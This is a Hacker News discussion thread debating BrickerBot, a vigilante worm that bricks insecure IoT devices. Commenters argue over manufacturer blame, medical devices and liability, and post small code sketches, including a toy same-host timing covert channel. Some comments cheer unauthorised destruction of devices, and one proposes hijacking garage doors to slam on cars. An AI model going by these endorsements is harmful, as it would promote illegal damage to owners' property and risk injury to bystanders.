3. With cars, we have efforts on safety and security on the user side, the manufacturer side, and in the law. There's no effort by these users to buy secure IoT, no effort to do even minimum protections at manufacturing, and no laws putting liability on users or manufacturers where it should be. Now, it's more like a car with defective parts that make it hit other cars. A city's worth are affected with nobody taking action, but people are told armored cars are available for a fortune.

So, these comparisons to highly damaging thefts of legit goods from innocent people are nonsense. There are defective products damaging innocent people. Nobody with the power to prevent or punish it legitimately is doing anything. I'm happy that a vigilante is reducing risk to Internet hosts, plus putting cost on those responsible for that risk.


Whether the car is hijacked to carry out attacks, or bricked by a vigilante trying to prevent another attack, I'd be pissed. But the blame lies squarely on the manufacturer who decided "meh, securing our devices against attack sounds expensive".


I think the problem is often not about caring, but about being unaware of anything outside their little subsystem.

You used to have what was essentially airgapped and self-contained.

But then feature x needed an ongoing net connection, and it happens to run on the same SoC as feature y that talks to the CAN bus, and boom.

Neither of the teams responsible for the features considers that something can jump from x to y, almost like an illness jumping between species.

Damn it, the other day HN linked to an article on how VMs sharing hardware could talk to each other using the CPU cache.


> VMs sharing hardware could talk to each other using the CPU cache

That sounds similar to a paper I read ~20 years ago that described a way to move data from a high-privilege process, bypassing mandatory access control (>= TCSEC B), using page faults as a covert channel.
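
For anyone who hasn't seen one, here's a toy, same-host illustration of the principle. It is not a real cross-VM cache or page-fault attack; it's Linux-only (because of sched_setaffinity) and every constant is arbitrary. The sender never writes any data, it just modulates contention on a shared core, and the receiver recovers the bits by timing its own work:

    # Toy timing covert channel: two processes pinned to the same core.
    # The sender burns CPU for a 1 bit and sleeps for a 0 bit; dips in the
    # receiver's printed loop counts mark the sender's 1 bits.
    import os
    import time

    SLOT = 0.2                        # seconds per bit (arbitrary)
    BITS = [1, 0, 1, 1, 0, 0, 1, 0]   # the "secret" being leaked

    def run(busy_bits):
        os.sched_setaffinity(0, {0})  # contend for core 0 (Linux-only)
        for bit in busy_bits:
            end = time.perf_counter() + SLOT
            n = 0
            while time.perf_counter() < end:
                if bit:
                    sum(range(10_000))
                    n += 1
                else:
                    time.sleep(0.001)
            yield n

    if os.fork() == 0:                  # child: the sender
        for _ in run(BITS):
            pass
        os._exit(0)
    else:                               # parent: the receiver stays busy and
        for n in run([1] * len(BITS)):  # measures its own throughput per slot
            print(n)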

> it happens to run on the same SoC as feature y that talks to the CAN bus

I wonder how many people will have to die to teach car manufacturers the lesson that there shouldn't be any electrical connection at all from the internet to the brakes.


Yep. The TCSEC had covert channel analysis as a requirement. Actually, two of the products (GEMSOS, STOP OS) certified at A1 can still be OEM-licensed today in some form, with a third (SNS Server) only sold to the defense sector. They have plenty of competition, too, in the MILS space. Solutions exist.


> But then feature x needed an ongoing net connection, and it happens to run on the same SoC as feature y that talks to the CAN bus, and boom.

So then the question becomes: How are we going to educate engineers about this class of problems?


I think the first step is integrating secure design practices into the curriculum. I was surprised to see how little emphasis was put on it in both traditional CS and engineering courses at the universities I work with.


It's not the engineers, it's our managers.


>how would you feel if

Feelings are irrelevant.

Some vigilante's hack that says "turn the car off at 10mph or less" is a far better outcome than the attacker's option of "press the gas and turn the wheel left as hard as you can at 100mph".


> Feelings are irrelevant.

Thank you. I am tired of these so-called arguments that start with "how would you feel if". If we're going by my feelings, you're all in deep trouble.


Can a case be made that insurance companies can make this problem less severe? I.e., deny insurance to unaudited companies, or charge a lot more if they refuse audits.


Stoplights are often installed after {n} people die at an intersection, to justify the cost. Is that cool?

Regulations are put on companies after their freedom of choice, when abused, starts harming people. I think IoT is a perfect example of this. Today the manufacturers have a great deal of freedom. Their lack of self-regulation will require others to step in and regulate them.

On the matter of vigilantes: This is a complicated topic, but I support them doing this, even if it harms myself or someone I care about. If this problem is not stopped sooner rather than later, it will explode into a much bigger economic and/or societal issue that will be difficult to contain. I have warned the people I care about already.

The current state of IoT is a complete lack of responsibility. I would even support someone bricking every piece of machinery they can, including cars, heavy equipment, power plants and anything else that was built without proper engineering.


I don't think the connection will ever be direct enough for the masses to care; there will never be an equivalent of dead bodies hanging out of car wreckage at an intersection.

If someone's dishwasher were streaming pirated movies, would they care? If their children's bedroom were unknowingly being streamed to pedophiles, would they care (obviously they wouldn't like it, but caring requires knowing)?

Vigilantes may be the least worst option.


Meh. This attack is going after the easiest of targets. If a medical device or something critical falls victim to this, it should cease to exist. I find it easy to believe that this attack protects far more people in the long run than it will ever hurt right now, and I'm willing to take that side of the moral dilemma.

It would be nice if we could live in a world where we all trust each other, and maybe with physical things this is attainable. But the IoT is a worldwide attack surface. It's open to nefarious actors ranging from junkies with stolen laptops, all the way to state-sponsored hacking organizations with billion dollar budgets. Trust and goodwill aren't options anymore.


Where do you draw the line? I could argue that because we know certain vehicles are remotely hackable, we should just disable all the cars without regard to their status of use. Literally zero difference in argument, yet the results would somehow dictate a different response.


I think this is a legitimate moral paradox. Are you saving more people in the long run by making sure the devices fail sooner rather than later? Not that it's the responsibility of random, unaccountable hackers. But it is someone's responsibility, someone who isn't fixing the problem we know exists.


The thing is, either way, someone is getting harmed. If these devices are left to run unpatched, they'll take part in attacks against whoever, and someone somewhere suffers. Possibly a lot of someones, Mirai wasn't exactly a joke.


wait a fucking minute

people are connecting medical devices to the internet?


If you connect it to a network, it's entirely plausible that there is a path to the internet. Even if it's on an airgapped network, laptops and phones end up on both through accidents...


Or people plugging in USB drives they found outside on ground. Or CD's before that. Or floppy discs before that. ;)


and not just medical devices, but life-support machines running with known security vulnerabilities?

There's nothing inherently wrong with connecting medical devices to the internet, and running an outdated OS on your specialized equipment is fine too as long as it's not being connected to any unsecured networks. But running a known insecure OS on an internet connected life support device has got to be a violation of some law or ethical regulation.


Experience has shown that connecting a device to the open Internet is inherently risky. I'd say any act of connecting a life-support device to the open Internet would have to balance that inherent risk against any supposed benefit such a connection might involve, even if the device manufacturer is following best practices for such a connection.


Don't be too alarmed; there are 3/4 classes of device, all with differing risk profiles. Patient safety includes things like protecting patient information, so even systems used to transfer medical records can be regarded as medical devices. Not sure I'd want a pacemaker updating online, though...


It might not be connected to the internet in an IoT way, but it makes a lot of sense to connect a device to a wi-fi network if you need to wirelessly transmit any form of data.


IoT way? I do not think you can trust traffic to stay local and not leak. This kind of thinking is what got us here.


> until one of those improperly configured devices is a medical device or something critical.

Medical or critical devices should never be exposed to the Internet, especially if badly configured. If there's something illegal involved here is putting lives at risk by not implementing proper security.

If I had to find an analogy: it's like someone hung a grand piano from a roof by a shoestring, and the hacker cuts the string, letting the piano fall at 4:00 in the morning, before it falls later on its own with a much higher probability of killing people. It's still a dangerous and wrong act, but it prevents a much worse one.


To play devil's advocate on that: if there's some super sensitive life support system that's indirectly connected to the internet, it's probably going to be turned off until it's actually in use.


To be fair, we don't know that the malware doesn't have a whitelist of devices approved to attack.


The description in the article did imply it's seeking very specific targets.

First, <2,000 devices hit per version? Mirai certainly doesn't show limitations like that.

Second, erases and corrupts? Unless I'm missing my mark, bricking a device that's running on firmware takes a fair bit more targeting than just adding it to a botnet.

edit: Ars has more info: https://arstechnica.com/security/2017/04/brickerbot-the-perm...

Apparently it specifically targets devices open to Mirai, and claims a 2,000,000+ kill count. Not sure what that means for medical gear, but it does mean XP is safe.


Okay, but why does a dialysis machine need to be on the internet? Even if it's done to forward reports regarding the usage of the machine, that can be done in a daily dump when you swap it out, I'm guessing, right? So it doesn't need to be an always-on device with respect to its NIC. Plus, there's no benefit to the user in having their life-giving machinery be online. It's just another thing to overcharge the hospital for, all in the false name of productivity.


It is not on the net, but it is on a LAN that has a firewall somewhere that is leaky.

This is because it is cheaper in the short run to string a single physical network and then use VLANs etc. to attempt to keep medical stuff from talking to accounting or the visitors' WiFi.

This is so a single overworked nurse can monitor a number of patients from a bank of monitors hooked to a thin client near the ward entrance.


Then it seems to me that more nurses and less dependence on fragile technology is a better option. Costs can be economized by many other methods. Labor should be the last thing to pare down.


Technology, done right, can be more reliable than humans.

But in this instance the weighing is done by beancounters looking at salaries as an ongoing expense, while tech is an investment that pays itself back the longer it can be used without further expenses.


If someone has life-sustaining medical equipment on a public network, they have lost their minds. Everything about that is likely subject to privacy regulations of some kind. It would violate best practices of network security with a vengeance.

If someone has life-sustaining medical equipment and they're not maintaining it by ensuring it gets its patches in a timely fashion, then that right there is where the blame starts. Doing so is no better than ignoring frayed wires on an extension cord.

The real horror is that such poorly designed devices would ever be deployed for such important uses. Things like BrickerBot don't even show up on the same scale.


I experience something akin to this at work all the time. There's the real-world pragmatists and the software purity philosophers.

Tell the family of someone killed that, "____ shouldn't have purchased a device without knowing how to secure it!"


If you want to tug on heartstrings with the "what about medical devices" argument, it's probably just as likely that a Mirai botnet will impact a life support or public safety network as that BrickerBot will.


Allowing a medical device that can kill or harm someone to be connected to the internet would be a dramatic failure of both the company that produced it and the government. Monitoring is one thing but it better be a one way street or air gapped. No one should be able to do anything to a medical device over the internet besides read information. Or even over a LAN. Even if it is much less convenient or practical.


One could make that argument in a hospital environment, but eventually patients go home. While they're at home, some telemedicine might save their lives. Should we expect e.g. pacemaker patients to know how to set up a VPN? Or maybe you're just saying that pacemakers must be controlled through direct contact only... that's on the device designers then, not on local network admins.


Yes, it should be direct contact. Even short range wireless would make me nervous without guarantees that it was just one way monitoring. I wouldn't blame network administrators for the safety of a device that should have never been on it in the first place.


Tell the family that the device was defective, and the manufacturer is entirely to blame. It's the simple truth, no need to try to blame the deceased.


I agree, we should just continue to let all the badly configured IoT devices be used against the end user. Doing something about it is dangerous, and no one likes danger.


Is there any evidence that BrickerBot targets medical devices?


No. In fact there is evidence that it does not specifically target them. However, they belong to a set of devices that may be affected by it.


Devices that can kill people have a whole different level of security than random IoT devices.


Sadly, they don't. What about a car with vulnerable software? It's not a medical device, but it could have real-world effects if the same actions were taken against it.


> Should


Why would a Dialysis machine even need an internet connection?


Because the sales guy insisted it'd help sales.


This is a more in-depth source for the same story: https://arstechnica.com/security/2017/04/brickerbot-the-perm...


After doing a little research it's worth noting a few key things:

1) This attack is not using 0-days. It's using vulnerabilities that have been in the wild for almost 6 months now, and that are so trivial to exploit that some security researchers called the exploits "amateurish". These types of devices have been used to DDoS lots of internet infrastructure. What, short of something like this, is going to get those devices and their manufacturers to secure their hardware, given that Mirai wasn't enough to convince them?

2) I honestly think that finding/making a legal means for this sort of scan (specifically, scanning for trivially insecure devices, and bricking them if they cannot be patched) to happen on a consistent basis is something the EFF or the like might want to look into. The problem with vigilantes is that they lack accountability, so while I might personally approve of the current approach from what I can see (even as I recognize it as illegal), it could easily take a turn for the worse. A standard requiring devices to survive X hours connected to the internet, and requiring a sample of devices (say 10) to still survive 6/12/18/24 months down the road or face a recall, would be a starting point. There are a lot of contingencies to work out, such as personal DIY projects, so it's not 100% fleshed out.

3) As far as I can tell, the better analogy is a bunch of people buying stereos and/or loudspeakers that are trivially hackable (though the consumers aren't aware of that), and then putting them everywhere. If those loudspeakers and/or stereos started disturbing the peace, or getting used in ultrasonic attacks on power lines or water mains, you can bet that police would be destroying them, and/or allowing others to do the same.


Uh-oh. Did somebody take my advice? https://news.ycombinator.com/item?id=12612539#12612809


I see a lot of people blaming the manufacturers, or blaming the hacker, then coming up with analogies to support their point of view. I blame the users and don't feel bad for them at all. The analogy I'm going with is one of your neighbors buying a cannon as a piece of art and leaving it pointed at your house. Ignorance is not an excuse.


These users don't think they're buying a cannon, they think they're buying a lightbulb which will mimic the sun or a blender which will automatically make a smoothie for them every morning.


> if somebody launched a car or power tool with a safety feature that failed 9 times out of 10 it would be pulled off the market immediately. I don’t see why dangerously designed IoT devices should be treated any differently

Really? He doesn't see how a car is different from a webcam? And why there are different safety standards for each?

His goal is laudable, but this seems like a fun way to engage in vandalism while hiding behind an ideological aegis. The sort of thing I'd have done when I was 15.


I think he believes internet-connected devices need at least basic security to reduce the damage they can cause to other systems, a problem long illustrated in the Windows market and more recently in IoT.


Slightly OT, but not too long ago I read that it is not uncommon for viruses to remove other known, competing malware. Does anyone know if anyone has ever made a virus whose only purpose is to remove other malware? Perhaps the same aggressive approach used by Janit0r is needed to stop the spread of worms, kill off botnets, etc.?


> Does anyone know if anyone has ever made a virus who's only purpose is to remove other malware?

The first computer virus was an experimental self-replicating program called Creeper.

And the second computer virus was Reaper, a similar program created for the sole purpose of deleting Creeper.

http://corewar.co.uk/creeper.htm


Not only that, but even the human immune system can instruct other cells to self-destruct if it detects they are infected! So what Janit0r is doing is kind of similar to that approach.



Yes, such things exist, but they are still technically malware.

It's a risky approach. It could have unintended consequences. If it's a worm, it could spread out of control and cause considerable harm purely from its transmission.

As attractive an idea as it might be, it's dangerous.


I toyed with a similar idea that would be limited to subnets or non-routable IP space, and open-source/community-driven, but I had to take it down almost immediately due to bad press/backlash. There's really no way to address this without government regulation making ISPs assume the external cost of botnets coming from devices on their networks. And the only way to justify that is to modify our computer crime laws to allow them to scan, patch, maybe even brick (or just turn off the customer's Internet and notify them) when vulnerable devices are found.


Links to the press? Always interested in how these things are handled.


Do you really think it's a good idea to give a badge and a gun to corporate ISPs? That opens the door to so much invasion of privacy.


It takes a special kind of entitlement to destroy people's things and then blame others (the manufacturers) for it.


I think it's rather brilliant. It is the manufacturer's responsibility to ship secure products. Here a consumer with a bricked product will demand a replacement/refund, putting pressure on the manufacturers to not ship shitty products. It's directly applying market pressure to sellers of insecure hardware, and that's a great thing.


> Here a consumer with a bricked product will demand a replacement/refund, putting pressure on the manufacturers to not ship shitty products.

If my shitty DLink camera suddenly stopped working, I wouldn't demand a refund - realistically, I'd just toss it in the bin and try to remember not to buy more DLink products. But I probably still would, if they were sufficiently cheap.

I imagine that calculus is similar for most people.


And DLink will continue to save money by releasing products without proper security practices, because you will keep buying them as long as they're cheap.

It's tough for security to affect purchasing decisions because it's difficult to measure. I can measure horsepower, megapixels, gigabytes, milliamp-hours, etc. so it's easy to make purchasing decisions based on which of those things are important to me.


I think what you're suggesting is that enough bricked devices will cause consumers to demand security - maybe even some measurable metric, like a certification of external audit - as part of the standard product search.

But I don't think bricking a device necessarily ties into security in people's minds. If they permanently modified it to always show HACKED_BCUZ_DLINK_SUX whenever I try to load the camera feed, sure - but a bricked camera is just a failure. I don't even know if it got hacked, or if a capacitor blew, or if a rodent chewed through something crucial.


Yes. In fact, I'm going to start stealing bikes that have insecure locks.


Please don't. With some funding from China, I'm currently running a massive worldwide operation that lets me spy on hundreds of millions of unsuspecting Master Lock users, tracking, among other things, where every bike user is at all times, and recording what they are doing.

If only it weren't for you meddling kid.

Analogies, aren't they great?

(Since it's apparent that sarcasm can't be read: "Stealing bikes" isn't the same bloody thing. Why even make that analogy?)


If this danger is real, isn't it best to inform the consumer, or perhaps use a lawsuit to force a recall, rather than destroying other people's hardware?

Does this concept apply to software? When the next large-scale RCE 0-day drops, does it make sense to use exploitation to destroy as much as possible in order to pressure the developers to ship a secure product? After all, the hacked machines could certainly allow an attacker lateral movement to sensitive data.


A lawsuit requires people "smart" enough to even know they were hacked, and for a recall the manufacturer gets to decide whether a recall is cheaper than legal/settlement fees (I learned this from Fight Club, lol). However, warranty replacements of devices bricked by a hacker could be a much faster way to force a recall.


> isn't it best to inform the consumer,

How? Like 5% of people who buy electronics actually turn in the warranty cards. No, these devices will sit on the shelf for years, polluting the internet with DDoS attacks and spam.

> does it make sense to use exploitation to destroy as much as possible in order to pressure the developers to ship a secure product?

Yes. That is also why I back up data using multiple methods, including offline ones.

Vigilante or blackhat doesn't matter. Whoever gets hold of the next RCE will gladly use it to spit copies of CryptoLocker everywhere.

The internet is a dangerous and well-connected place. If I lived in China, I would think it funny to wipe a few large US corporations off the map because they used a DLINK webcam. And there is only a tiny chance in hell anyone would ever find me.


There are a few things missing in this comparison, most notably that the bike manufacturer isn't claiming the bike is already secure ("auto-locking" bikes), making additional security challenging (bikes that locks are very hard to install on), or generally profiting from an environment of misinformation about bike theft and bike safety.

Additionally, theft of property brings you personal gain.

I'm not sure I ethically support the hacker's actions, but I don't think the bike example has the market/awareness effects that make it at all defensible.


What kind of stupid person would think that we could have a cooperative, functional society where I can just be careless with my bike, right?

What's the problem with these people?

Sarcasm aside, I live in Brazil. Ask any Brazilian who has stayed in a European country what the biggest difference was: "I could feel safe at any time, without worrying about my stuff."

That really shapes the mind and behaviour of people.


Which is great, in theory. But devices in Europe are just as accessible to Brazilians as they are to anyone else. Unless a device is locked down to local access, you can't have "safe neighborhoods".


> What kind of stupid person would think that we could have a cooperative, functional society where I can just be careless with my bike, right?

Isn't this actually a really common sentiment, though? I've lived in several places where leaving a bike unlocked for 5 minutes, or sloppily locked for an hour, means you're going to lose it.

That doesn't make the theft acceptable, but if a friend borrowed your bike and left it unlocked you'd still get mad at them.

Reshaping society so this stuff doesn't happen is great, but on an inside-view level we treat crime as sort of an inevitable "someone will do it" force.


> Reshaping society so this stuff doesn't happen is great, but on an inside-view level we treat crime as sort of an inevitable "someone will do it" force.

I don't disagree with you; however, I think there are levels to this concept. E.g., how would two different places handle a lost wallet, a fairly clear opportunity for embezzlement, or a bike parked in front of a coffee shop?


You may get the exact same answer from a European who has lived in Japan.


>What kind of stupid person would think that we could have a cooperative, functional society where I can just be careless with my bike, right?

The same kind of stupid person that doesn't realize they live in a ghetto called "The Internet".


Having a bad lock on your bike generally doesn't cause much harm to others. Allowing your hardware to be used for, e.g., DDOS attacks does.


I understand what you're implying, but no one is "allowing" their hardware to be used criminally. At least in the U.S., our personal property system is permissive, i.e. you may not use my things without permission. So using an IoT device as provided by the manufacturer "allows" its misuse only as much as leaving my backyard gate unlocked "allows" criminals to park their stolen goods in my backyard.


Ok, but we do have "attractive nuisance" laws. If you leave out a trampoline next to barbed wire, you can be held accountable even if you didn't actually permit anyone to use it.

This actually seems much closer to the IoT issue than theft. The maker and user of the device have created an inviting target which will cause harm to someone other than themselves. Even if the eventual attack is illegal, they can still be held accountable for making it so likely.


Honestly, I've never heard of a law like that. The U.S. is a big place; while that may be the case in parts of the country, it's never come to my attention in the South where I'm from, especially in the rural areas where I grew up. Instead, the people using your things without permission are at the very least trespassing.


IANAL, and I can't find a definitive statement of where the doctrine applies, but I see it referenced in cases in many US southern states (AL, GA, AR, KY, FL, TX). I know that the particulars vary in many states, based on precedent and statute, but I'm not aware of anywhere it's absent entirely. Hopefully someone more knowledgeable will come along and clarify.

Note that "attractive nuisance" is specifically about trespassing children.

https://en.wikipedia.org/wiki/Attractive_nuisance_doctrine


It's a very well entrenched common law concept. The same goes for swimming pools: if you build a swimming pool and don't put an adequate fence around it, and a kid comes by, jumps in, and drowns, you're probably going to be found liable (not criminally, but you can be successfully sued for it).


The only attractive nuisance laws I've heard of applied to children. If you have a swimming pool without a fence, and a child sneaks onto your property and drowns you are liable.

IANAL, and it's hearsay, but I had thought this was something everyone knew.


A poor choice of words on my part. That aside, the point remains: poorly secured IoT devices cause real harm to others in a way that a poorly secured bike does not.


That market pressure already exists, and what do you know, the market strongly favors certain locks directly because of that pressure.


Very different. If you can bust an insecure lock you can steal a bike. If you bust an insecure IoT device, you can steal data from potentially thousands or millions of people.


Not only that, but it can be used in a botnet that renders the entire internet unusable.


I am not sure this is a good analogy. Stealing a bike only affects one person. An IoT device that brings down the internet in a DDoS attack impacts everyone.


Well, the manufacturer-provided lock is a piece of string connected to an index card that says "do not open", and the bikes are being regularly used in crimes against the public at large.

Given the owner of the bike could conceivably be held liable for the use of their bike to commit crimes, the janit0r who decided to clean up this crap comes across as the lesser of two evils.


I feel like a more accurate analogy is that you are going to start breaking into poorly secured garages and destroy people's bikes so that the owner can't ride them anymore.


While I am on the fence about a lot of what is happening, I would have thought a more appropriate analogy would be breaking into a poorly secured garage that was sold as a single unit to the customer, then welding shut the door and any other access so that no one can ever use the garage again.


No. The product is going to be out of warranty, the manufacturer is going to refuse to replace the device, and suddenly a customer is out hundreds or thousands of dollars out of their own pocket. IoT devices are not cheap.

I find it reprehensible that the Gizmodo author (who is using his position as a journalist to encourage criminals) and HN commenters are applauding this hacker as if he's a hero of the people, fighting for a better future. He's directly harming individuals who have purchased products. This is not a friendly reminder to manufacturers to get their shit together. It's some guy illegally connecting to, taking control of, and bricking computers.

I've seen him referred to as a greyhat. No. Everything about this is strictly blackhat. This hacker deserves prison time. What a piece of lowlife scum. It really does sound like a 15 year old getting off on making waves, rather than someone who gives a damn about security.


Yeah, it's a force to be reckoned with, but that does not mean it's ethical.


How are the manufacturers not to blame? One way or another, these devices are getting hacked. Only most of the time, they're taking down Playstation Network or GitHub rather than being bricked.

Attacks on devices that have hardcoded weak credentials online aren't an event or an act. They're a force of nature, like erosion. No-one would be happy with someone building bridges that don't account for erosion. Nor is it ok to ship something that connects to the internet and doesn't account for the millions of automated bots that are prowling the web 24/7 looking for insecure devices.

The manufacturers are 100% to blame, and the worst thing is that they're not the ones that deal with the fall-out – innocent companies and consumers are.


It's sort of like your neighbor having an automated lawnmower, and you knowing that with careful placement of rocks the image recognition will fritz out and it will happily start mowing into your yard, over your petunias and possibly your small children and animals. You're fairly certain there are other problems with it you don't know about as well.

Do you force the situation and make it mow into your yard and over a bunch of rocks to destroy it, or do you live with the danger?

I don't have an answer. In this situation you could at least talk to your neighbor. Without the ability to feasibly do that, I'm not sure I would fault either action.


Think about it. If you have kids or pets or flowers, it seems like it would be more prudent to trigger the failure in a safe, known environment than to leave it to chance (and risk injury to property or third parties). And it seems to me that the talking-to-the-neighbor stage happened over a decade ago.


Sure, depending on the chances of it happening. The problem is that we don't know what the chances are, and as a species we're fairly bad at assessing stuff like that in general. If it's a million-to-one chance, there are probably plenty of other more worthy perils to be concerned with first. If it's a hundred-to-one chance, it may be an imminent threat. Which is it? How do you trust that the person telling you the odds isn't vastly over or under estimating the chances?

The answer falls into an area that's somewhat unknowable with current information, which is why I can't fault either behavior.


I disagree. We know that the probability of it happening again is very high, seeing as it has already happened multiple times, and no serious action has been taken to improve the situation. If we were speculating about a theoretical risk, I would agree with you.


I think the issue is less the chance of the lawnmower going wild by itself (because screw that, I don't care how small the chance is, it's not acceptable), and more the chance of the lawnmower exploding and taking out your eye when you trigger its failure yourself.

As in, "the chance of getting hacked" < "the chance of the vigilante creating dangerous situations".


It takes a special kind of entitlement to put internet-connected devices on the market that basically have no security.


This statement and others like it here seem to assume that the hacker has not been directly affected by the infected devices.

For example, maybe this person had a wife dying of cancer while Mirai destroyed his life's work, so in the same period he lost his wife and he lost his work.

Or, maybe he spent a lot of money trying to launch a new product through channels that were destroyed during one of the attacks, and unable to get his money back, had to close the venture.

Maybe he had to sleep in a data center for several months over the holidays and concluded that the only reason he had to was that consumers and manufacturers aren't concerned with the damage they are doing, so he is going to make them concerned.

The point is that we have no idea whether this person has been harmed, whether they have any legitimate means of being made whole for harm already done, or whether they can protect themselves from future harm.

Clearly, the proposed solutions coming from industry "experts" are likely to make things worse, as the only other activity "fighting" Mirai seems to be supporting legislation as a solution to a technical problem, and I'm really not clear on when that has ever worked, especially in a system that everything on the planet can connect to.


> It takes a special kind of entitlement to destroy people's things and then blame others (the manufacturers) for it.

If you put a dangerous, insecure device live on the Internet, one that can be used to attack other machines, you deserve to have your property destroyed.


"Something Wonderful has Happened"

https://en.wikipedia.org/wiki/SCA_(computer_virus)


As someone who works as a software consultant for many IoT and connected device companies, how can I increase my understanding of IoT security? How can I ensure the devices I work with are secure?


Since posting this, I did some research, and it looks like the biggest security problem (currently) is manufacturers hardcoding default passwords into the firmware. Here I was thinking I'd need to become an expert in security to help my clients secure their devices, but is it really as simple as encouraging clients to set secure default passwords?


Unique passwords for each device, some form of auto-updating so the OS and any web servers don't get too old, and making sure the developers know about the OWASP Top 10 should go a long way toward making the devices secure.

Anything else would be dependent on what the device is for and how it does it.
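
To make the unique-per-device password point concrete, here's a minimal sketch (assuming a Python provisioning script at the factory) of deriving each unit's default password from its serial number with a keyed hash. FACTORY_SECRET, the function name, and the 16-character truncation are all illustrative assumptions, not any particular vendor's scheme:

    # Minimal sketch: derive a unique default password per device at
    # provisioning time, so no two units ship with the same credentials.
    # The secret lives only in the factory system, never on the device.
    import base64
    import hashlib
    import hmac

    FACTORY_SECRET = b"keep-this-only-in-the-provisioning-system"  # illustrative

    def default_password_for(serial: str) -> str:
        digest = hmac.new(FACTORY_SECRET, serial.encode(), hashlib.sha256).digest()
        # Truncate to something short enough to print on the unit's label.
        return base64.b32encode(digest)[:16].decode().lower()

    print(default_password_for("SN-000123"))  # goes on the device's sticker

Mirai spread with a dictionary of a few dozen shared factory credentials, so even this much per-device variation would have taken those devices off its target list.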


MIT has a pretty good online class about security.

https://ocw.mit.edu/courses/electrical-engineering-and-compu...


That's terrible but also kind of awesome. Remember, these things are unsecured and they're going to get owned anyway, it's just a matter of time. That doesn't make this right, but it is important context to keep in mind.


The writer of the story tries really hard to spin a vigilante-justice narrative and glorify someone who is causing real damage to computer systems. We saw the same thing with the Ashley Madison hack: they make the original vendors out to be scumbags. Things are much more complicated. Yes, vendors and websites should keep things more secure, but if you really want IoT to be more secure, I don't believe hacks, large or small, are the best way to get there. The consumer is really the one who loses here.


Well, yeah, that's half the point. Manufacturers can't be bothered because it doesn't hurt them; there isn't a way to hurt them short of lawsuit or legislation. We don't really have the standing or power to effect change, so he hurts the consumers, who then complain to the manufacturers. Nobody thinks this is a nice solution, but is there a better alternative?


It's what I said people should do. Kind of like the 2nd Amendment applied to third-party devices that nobody will do anything about. It might also generate demand for more secure devices on the consumer side, or liability on the supplier side for the lack of them. Good to see someone is doing it. There were quite a few other people wanting to see these bricked in the last HN thread about it:

https://news.ycombinator.com/item?id=12771067


It's simple for manufacturers to make their devices secure from corruption. Put the firmware in ROM. Malware will not survive rebooting the device.

If you really must be able to update the firmware, add a physical "write enable" switch, not a software enabled one.
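
As a sketch of how the device side of that physical write-enable switch might look on an embedded-Linux box: gate the update routine on a GPIO read before touching flash. The sysfs path, pin number, and /dev/mtd0 target are made-up placeholders; flashcp is the real mtd-utils flashing tool:

    # Sketch: refuse to write firmware unless the physical switch is set.
    # Assumes embedded Linux exposing the switch at a (hypothetical) GPIO
    # sysfs path; the flash partition path is likewise illustrative.
    import subprocess

    WRITE_ENABLE = "/sys/class/gpio/gpio17/value"  # hypothetical pin

    def switch_pressed() -> bool:
        with open(WRITE_ENABLE) as f:
            return f.read().strip() == "1"

    def flash_firmware(image: str) -> None:
        if not switch_pressed():
            raise PermissionError("write-enable switch off; refusing to flash")
        # flashcp (mtd-utils) copies an image onto a raw flash partition.
        subprocess.run(["flashcp", image, "/dev/mtd0"], check=True)

The nice property is that no remote compromise can flip that bit: an attacker who owns the software still can't persist past the ROM/switch barrier.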


The method they're describing is only permanent for devices without a removable startup disk, right? If they run this on my raspberry pi, for example, just reformatting the sd card and following the same process as when I first got it should immediately fix this.


Yes, it makes every effort to corrupt the filesystem that the operating system is stored on and to mess up the networking before shutting down or rebooting the device. If the device has its OS on read-only media, this won't do much; maybe it will turn off until someone power-cycles it. If you can reformat or reflash the disk, then you can recover. For a Raspberry Pi that's cool. For an IP camera it's generally a problem.


This is perhaps the only way: get customers irritated enough about security exploits to act.

Nice thinking, though.


I am fascinated by the somewhat Darwinian trajectory this might take. Let's project forward ten or twenty years, to when that smart lightbulb has the computing power of a 1990s-era supercomputer. Might all the lightbulbs in my neighborhood form an intelligent swarm? Will they be engaged in inter-swarm battles? It's not like there's an "off" button. Has any good sci-fi explored this topic?


Didn't a grey hat similarly flash a ton of old routers following Heartbleed? Search isn't providing results at the moment, but I do recall an uptick in retail routers failing after the Heartbleed news wave, with little mentioned as to why. If memory serves, it didn't "brick" them; it broke DHCP (they no longer assigned dynamic addresses on WAN or LAN).


Bricking them is too merciful. They should have taken over some garage door openers, measured the average time between opening and closing, and then closed the door suddenly at t == t_Signal + t_Average/3. Security is when your door is not trying to get into your car. The "carcrackodile" would raise awareness.


Is this how we solve security? An army of white botnets in a never ending war with an army of black botnets?


Can somebody add "BrickerBot author" to the title so it carries at least a bit of information?


Thanks, we did update the title from the original “This Hacker Is My New Hero”.


Actual article title: "This Hacker Is My New Hero"



